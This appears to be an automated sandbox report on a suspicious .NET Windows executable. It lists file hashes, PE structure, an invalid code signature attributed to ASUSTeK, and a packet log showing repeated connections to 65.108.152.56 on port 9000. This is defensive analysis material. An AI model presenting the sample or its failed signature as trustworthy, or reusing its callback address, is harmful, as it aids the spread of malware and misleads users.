                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

                                                                                                                                                                                              Static File Info

                                                                                                                                                                                              General

                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                              Entropy (8bit):7.414407050048219
                                                                                                                                                                                              TrID:
                                                                                                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                              File name:file.exe
                                                                                                                                                                                              File size:358'000 bytes
                                                                                                                                                                                              MD5:b9773393891d9cc471cd58cac09052dd
                                                                                                                                                                                              SHA1:784a14954c7abca7d7e2e92c60b93557238426f4
                                                                                                                                                                                              SHA256:0a8357cb9a1d348d1c4b4ec101f2328fd43f976803bcc360525ced55fbb9aeaf
                                                                                                                                                                                              SHA512:72a669e736ecfc5422a07542e15cad7d82b9ae41591f4c375e31fa4dc2d70f620b44ff19b5b6d0928aac3cf244a3143af433d47eeaa3c5c6b9968cf71d1e6848
                                                                                                                                                                                              SSDEEP:6144:Dqv0Ib3JJzx1MfjF+N33l3+YBVYjZ7eZH9PJWweK/ojy8Kkc2ivFt+0P:Gb3TEbF+13NPYd6B9lcdFBsPP
                                                                                                                                                                                              TLSH:B1749FD48267CF37D3ED0778F095120593FD820B8893FB4A6A2416A1590A3E2F7566FB
                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...o.8f.................F...........d... ........@.. ....................................`................................

                                                                                                                                                                                              File Icon

                                                                                                                                                                                              Icon Hash:90cececece8e8eb0

                                                                                                                                                                                              Static PE Info

                                                                                                                                                                                              General

                                                                                                                                                                                              Entrypoint:0x4564de
                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                              Digitally signed:true
                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                              Time Stamp:0x6638D46F [Mon May 6 13:00:31 2024 UTC]
                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                              OS Version Major:4
                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                              File Version Major:4
                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                              Authenticode Signature

                                                                                                                                                                                              Signature Valid:false
                                                                                                                                                                                              Signature Issuer:CN=DigiCert EV Code Signing CA (SHA2), OU=www.digicert.com, O=DigiCert Inc, C=US
                                                                                                                                                                                              Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                              Error Number:-2146869232
                                                                                                                                                                                              Not Before, Not After
                                                                                                                                                                                              • 08/10/2020 01:00:00 12/10/2023 13:00:00
                                                                                                                                                                                              Subject Chain
                                                                                                                                                                                              • CN=ASUSTeK COMPUTER INC., O=ASUSTeK COMPUTER INC., L=Beitou District, S=Taipei City, C=TW, SERIALNUMBER=23638777, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=TW
                                                                                                                                                                                              Version:3
                                                                                                                                                                                              Thumbprint MD5:332CDC164B1324C3FF3F64E228C5FFFC
                                                                                                                                                                                              Thumbprint SHA-1:CBFB3D25134A5FF6FCF2924D5B4BE16194EA7E13
                                                                                                                                                                                              Thumbprint SHA-256:531855F05B9D55E4F6DDEBC443706382DDB9ACBD2B8AB24004822BE204420943
                                                                                                                                                                                              Serial:0C9838F673F9B1CCE395CFAB2B6684E4

                                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                                              Instruction
                                                                                                                                                                                              jmp dword ptr [00402000h]
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al

                                                                                                                                                                                              Data Directories

                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x564900x4b.text
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x580000x53c.rsrc
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x550000x2670
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x5a0000xc.reloc
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x564470x1c.text
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                              Sections

                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                              .text0x20000x544e40x54600cd200369f3723ebffd9769e4598cb5e7False0.7394241898148148data7.421157543801175IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                              .rsrc0x580000x53c0x600b3903f7a2f10b94867e427ae266651a6False0.390625data3.9246143706878946IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                              .reloc0x5a0000xc0x200fb9aeb40bfad98519cace1adb7b9f6daFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                              Resources

                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                              RT_VERSION0x580a00x2b0data0.4375
                                                                                                                                                                                              RT_MANIFEST0x583500x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                                                                                                                                              Imports

                                                                                                                                                                                              DLLImport
                                                                                                                                                                                              mscoree.dll_CorExeMain

                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                              May 7, 2024 05:28:54.186081886 CEST49731443192.168.2.4104.105.90.131
                                                                                                                                                                                              May 7, 2024 05:28:54.186120033 CEST44349731104.105.90.131192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:54.186193943 CEST49731443192.168.2.4104.105.90.131
                                                                                                                                                                                              May 7, 2024 05:28:54.192341089 CEST49731443192.168.2.4104.105.90.131
                                                                                                                                                                                              May 7, 2024 05:28:54.192354918 CEST44349731104.105.90.131192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:54.373563051 CEST44349731104.105.90.131192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:54.373641014 CEST49731443192.168.2.4104.105.90.131
                                                                                                                                                                                              May 7, 2024 05:28:54.444263935 CEST49731443192.168.2.4104.105.90.131
                                                                                                                                                                                              May 7, 2024 05:28:54.444284916 CEST44349731104.105.90.131192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:54.444617987 CEST44349731104.105.90.131192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:54.444678068 CEST49731443192.168.2.4104.105.90.131
                                                                                                                                                                                              May 7, 2024 05:28:54.447978020 CEST49731443192.168.2.4104.105.90.131
                                                                                                                                                                                              May 7, 2024 05:28:54.488120079 CEST44349731104.105.90.131192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:54.825839996 CEST44349731104.105.90.131192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:54.825865030 CEST44349731104.105.90.131192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:54.825894117 CEST44349731104.105.90.131192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:54.825948954 CEST49731443192.168.2.4104.105.90.131
                                                                                                                                                                                              May 7, 2024 05:28:54.825969934 CEST44349731104.105.90.131192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:54.825989008 CEST49731443192.168.2.4104.105.90.131
                                                                                                                                                                                              May 7, 2024 05:28:54.826020956 CEST49731443192.168.2.4104.105.90.131
                                                                                                                                                                                              May 7, 2024 05:28:54.911032915 CEST44349731104.105.90.131192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:54.911071062 CEST44349731104.105.90.131192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:54.911122084 CEST49731443192.168.2.4104.105.90.131
                                                                                                                                                                                              May 7, 2024 05:28:54.911129951 CEST44349731104.105.90.131192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:54.911159992 CEST49731443192.168.2.4104.105.90.131
                                                                                                                                                                                              May 7, 2024 05:28:54.911175013 CEST49731443192.168.2.4104.105.90.131
                                                                                                                                                                                              May 7, 2024 05:28:54.929805040 CEST44349731104.105.90.131192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:54.929846048 CEST44349731104.105.90.131192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:54.929867983 CEST44349731104.105.90.131192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:54.929883003 CEST49731443192.168.2.4104.105.90.131
                                                                                                                                                                                              May 7, 2024 05:28:54.929925919 CEST49731443192.168.2.4104.105.90.131
                                                                                                                                                                                              May 7, 2024 05:28:54.930380106 CEST49731443192.168.2.4104.105.90.131
                                                                                                                                                                                              May 7, 2024 05:28:54.930394888 CEST44349731104.105.90.131192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:54.940658092 CEST497329000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:55.124442101 CEST90004973265.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:55.124541044 CEST497329000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:55.124906063 CEST497329000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:55.308558941 CEST90004973265.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:55.335064888 CEST90004973265.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:55.335078001 CEST90004973265.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:55.335280895 CEST497329000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:55.904119015 CEST497329000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:56.088542938 CEST90004973265.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:56.088629007 CEST497329000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:56.088963985 CEST497329000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:56.314002037 CEST90004973265.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:56.604398012 CEST90004973265.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:56.604489088 CEST497329000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:56.607820034 CEST497349000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:56.791517973 CEST90004973465.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:56.791601896 CEST497349000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:56.791857958 CEST497349000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:56.975559950 CEST90004973465.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:56.975790024 CEST90004973465.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:56.975832939 CEST497349000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:56.976175070 CEST497349000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:56.977679014 CEST497349000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:57.161231041 CEST90004973465.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:57.567095041 CEST90004973465.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:57.567166090 CEST497349000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:57.568280935 CEST497329000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:57.568749905 CEST497359000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:57.752975941 CEST90004973265.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:57.753046989 CEST497329000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:57.755163908 CEST90004973565.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:57.755229950 CEST497359000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:57.755485058 CEST497359000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:57.940929890 CEST90004973565.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:57.941137075 CEST90004973565.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:57.941189051 CEST497359000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:57.943748951 CEST497359000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:57.945174932 CEST497359000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:58.130691051 CEST90004973565.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:58.491302967 CEST90004973565.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:58.491322041 CEST90004973565.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:58.491475105 CEST497359000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:58.492830992 CEST497349000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:58.493206978 CEST497369000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:58.681381941 CEST90004973465.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:58.681405067 CEST90004973665.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:58.681457043 CEST497349000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:58.681514978 CEST497369000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:58.681926966 CEST497369000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:58.865605116 CEST90004973665.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:58.865900040 CEST90004973665.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:58.865962982 CEST497369000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:58.866276026 CEST497369000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:58.867717028 CEST497369000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:59.053447008 CEST90004973665.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:59.444582939 CEST90004973665.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:59.444606066 CEST90004973665.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:59.444619894 CEST90004973665.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:59.444633961 CEST90004973665.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:59.444647074 CEST90004973665.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:59.444659948 CEST497369000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:59.444688082 CEST497369000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:59.444708109 CEST497369000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:59.496557951 CEST497359000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:59.496889114 CEST497379000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:59.682235956 CEST90004973565.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:59.682264090 CEST90004973765.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:59.682312965 CEST497359000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:59.682363033 CEST497379000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:59.682749987 CEST497379000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:59.868175030 CEST90004973765.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:59.868784904 CEST90004973765.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:28:59.868841887 CEST497379000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:59.869191885 CEST497379000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:59.870656013 CEST497379000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:28:59.870702028 CEST497379000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:00.056701899 CEST90004973765.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:00.056719065 CEST90004973765.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:00.528235912 CEST497369000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:00.531414032 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:00.566262960 CEST90004973765.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:00.566320896 CEST497379000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:00.712208033 CEST90004973665.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:00.712281942 CEST497369000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:00.716850996 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:00.717017889 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:00.717437983 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:00.902920961 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:00.903085947 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:00.903146982 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:00.903420925 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:00.905021906 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.090579033 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.091330051 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.091382980 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.091391087 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.091396093 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.091428995 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.091442108 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.091463089 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.091506004 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.091521978 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.091538906 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.091551065 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.091574907 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.091583014 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.091604948 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.091607094 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.091619015 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.091624975 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.091645956 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.091655016 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.104315996 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.104379892 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.276869059 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.276885986 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.276946068 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.283539057 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.283572912 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.283627033 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.296478987 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.296493053 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.296555996 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.309021950 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.309036016 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.309082985 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.321839094 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.321851969 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.321888924 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.321928024 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.334321022 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.334335089 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.334389925 CEST497389000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:01.346983910 CEST90004973865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:01.347050905 CEST497389000192.168.2.465.108.152.56
